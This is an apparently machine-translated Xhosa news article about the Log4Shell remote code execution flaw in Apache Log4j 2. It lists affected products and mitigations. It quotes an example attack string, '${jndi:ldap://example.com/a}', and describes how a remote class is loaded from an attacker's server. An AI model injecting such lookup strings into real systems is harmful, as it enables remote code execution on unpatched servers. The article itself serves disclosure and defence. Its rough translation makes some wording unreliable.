I-Log4Shell, ubuthathaka obubalulekileyo kwi-Apache Log4j 2 echaphazela iiprojekthi ezininzi zeJava

Darkcrizt

Imizuzu ye4

Kutshanje sIindaba zakhutshwa ukuba ubuthathaka obubalulekileyo ichongiwe kwi-Apache Log4j 2, ebonakaliswe njengesakhelo esithandwayo sokulungelelanisa irejista kwizicelo zeJava, ukuvumela ukuphunyezwa kwekhowudi engafanelekanga xa ixabiso elifomathiweyo libhalwa kwirejista kwifomathi "{jndi: URL}".

Ukuba sesichengeni Kuyaphawuleka kuba uhlaselo lunokuqhutywa kwizicelo zeJava ukubaBabhala amaxabiso afunyenwe kwimithombo yangaphandle, umzekelo ngokubonisa amaxabiso anengxaki kwimiyalezo yempazamo.

Kuyaqapheleka ukuba phantse zonke iiprojekthi ezisebenzisa izikhokelo ezinje ngeApache Struts, Apache Solr, Apache Druid okanye Apache Flink ziyachaphazeleka, kubandakanya iSteam, iApple iCloud, abathengi beMinecraft kunye neeseva.

Kulindeleke ukuba ubuthathaka bunokukhokelela kuhlaselo olukhulu kwizicelo zeshishini, ukuphinda imbali yobuthathaka obubalulekileyo kwisakhelo, i-Apache Struts, eluqikelelo olurhabaxa olusetyenziswe kwi-65% yezicelo zewebhu ze-Fortune 100. Uluhlu lwenkampani izicelo web zibandakanyiwe iinzame sele zirekhodiwe ukuskena womnatha iinkqubo ezisesichengeni.

Ubuthathaka buvumela ukwenziwa kwekhowudi ekude okungavunywanga. I-Log4j 2 ngumthombo ovulekileyo wethala leencwadi lokungena kwiJava eliphuhliswe yiApache Foundation. I-Log4j 2 isetyenziswa ngokubanzi kwizicelo ezininzi kwaye ikhona, njengokuxhomekeka, kwiinkonzo ezininzi. Oku kubandakanya izicelo zeshishini kunye neenkonzo ezininzi zelifu.

Iqela lohlaselo leRandori liphuhlise ukuxhaphaza okusebenzayo kwaye liye lakwazi ukusebenzisa ngempumelelo obu buthathaka kwiindawo zabathengi njengenxalenye yeqonga lethu lokhuseleko elikhubekisayo. 

Ubuthathaka bunokufikelelwa ngobuninzi beendlela ezithe ngqo kwisicelo. Ngokwenene, nayiphi na imeko evumela uqhagamshelo olukude ukubonelela ngedatha engenamkhethe ukuba isicelo esisebenzisa ilayibrari ye-Log4j sibhala kwiifayile zokungena sisengozini yokuxhatshazwa. Obu buthathaka bunokwenzeka ukuba busetyenziswe endle kwaye bunokuchaphazela amawaka emibutho. Obu buthathaka bumele umngcipheko wokwenyani obalulekileyo kwiinkqubo ezichaphazelekayo.

Ingxaki idityaniswe yinyaniso yokuba i-exploit esebenzayo sele ikhululiwe, pKodwa ukulungiswa kwamasebe azinzileyo akukenziwa okwangoku. Isichongi se-CVE asikabelwa. Ukulungiswa kubandakanyiwe kuphela kwisebe lovavanyo log4j-2.15.0-rc1. Njengomsebenzi wokuvala ubuthathaka, kuyacetyiswa ukuba usete iparamitha yeLog4j2.formatMsgNoLookups ibe yinyani.

Ingxaki kwakungenxa yokuba i-Log4j 2 ixhasa ukuphatha iimaski ezikhethekileyo "{}" kwimigca yelog, apho ku Imibuzo ye-JNDI inokuphunyezwa (Igama leJava kunye nesiNxulumanisi soLawulo).

Ngokuhlalutya i-CVE-2021-44228, uRandori umisele oku kulandelayo:

Ufakelo oluhlala lukhona lwesoftware yeshishini esetyenziswa ngokubanzi lusemngciphekweni.
Ukuba sesichengeni kungasetyenziswa ngokuthembekileyo kwaye ngaphandle kokuqinisekisa.
Ukuba sesichengeni kuchaphazela iinguqulelo ezininzi zeLog4j 2.
Ubuthathaka buvumela ukwenziwa kwekhowudi ekude xa umsebenzisi eqhuba usetyenziso olusebenzisa ithala leencwadi.

Uhlaselo lubilisa ekugqithiseni umtya ngokufaka endaweni "${jndi:ldap://example.com/a}", xa kusetyenzwa iLog4j 2 eya kuthumela isicelo se-LDAP sendlela eya kwiklasi yeJava kumhlaseli.com umncedisi. Indlela ebuyiswe ngumncedisi womhlaseli (umzekelo http://example.com/Exploit.class) iya kulayishwa kwaye isetyenziswe kumxholo wenkqubo yangoku, ivumela umhlaseli ukuba afezekise ukuphunyezwa kwekhowudi engafanelekanga kwinkqubo kunye namalungelo enkqubo. usetyenziso lwangoku.

Okokugqibela, kuyakhankanywa ukuba ukuba izinto ezingaqhelekanga zifunyenwe, kucetyiswa ukuba ucinge ukuba esi sisiganeko esisebenzayo, ukuba sichatshazelwe, kwaye uphendule ngokufanelekileyo. Ukuhlaziya iinguqulelo ezifakwe kwiLog4j 2 okanye izicelo ezichaphazelekayo ziya kuphelisa obu buthathaka. I-Randori icebisa nawuphi na umbutho okholelwa ukuba unokuchaphazeleka ukuba uphucule ngokukhawuleza uguqulelo oluzigcawu.

Kuhlaziyo lwamva nje lweqela le-Apache Log4j, cebisa ukuba imibutho yenze oku kulandelayo

  • Hlaziya kwiLog4j 2.15.0
  • Kwabo bangakwaziyo ukunyusela kwi-2.15.0: Kwiinguqulelo >= 2.10, obu buthathaka bunokuthotywa ngokuseta ipropathi yenkqubo ye-log4j2.formatMsgNoLookups okanye i-LOG4J_FORMAT_MSG_NO_LOOKUPS eguquguqukayo yokusingqongileyo ukuya kwinyani.
  • Kwiinguqulelo ze-2,0-beta9 ukuya kwi-2.10.0, ukunciphisa kukususa iklasi ye-JndiLookup kwi-classpath: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup /JndiLookup.class.

Umthombo: https://www.lunasec.io/


Shiya uluvo lwakho

Idilesi yakho ye email aziyi kupapashwa. ezidingekayo ziphawulwe *

*

*

  1. Uxanduva lwedatha: UMiguel Ángel Gatón
  2. Injongo yedatha: Ulawulo lwe-SPAM, ulawulo lwezimvo.
  3. Umthetho: Imvume yakho
  4. Unxibelelwano lwedatha: Idatha ayizukuhanjiswa kubantu besithathu ngaphandle koxanduva lomthetho.
  5. Ukugcinwa kweenkcukacha
  6. Amalungelo: Ngalo naliphi na ixesha unganciphisa, uphinde uphinde ucime ulwazi lwakho.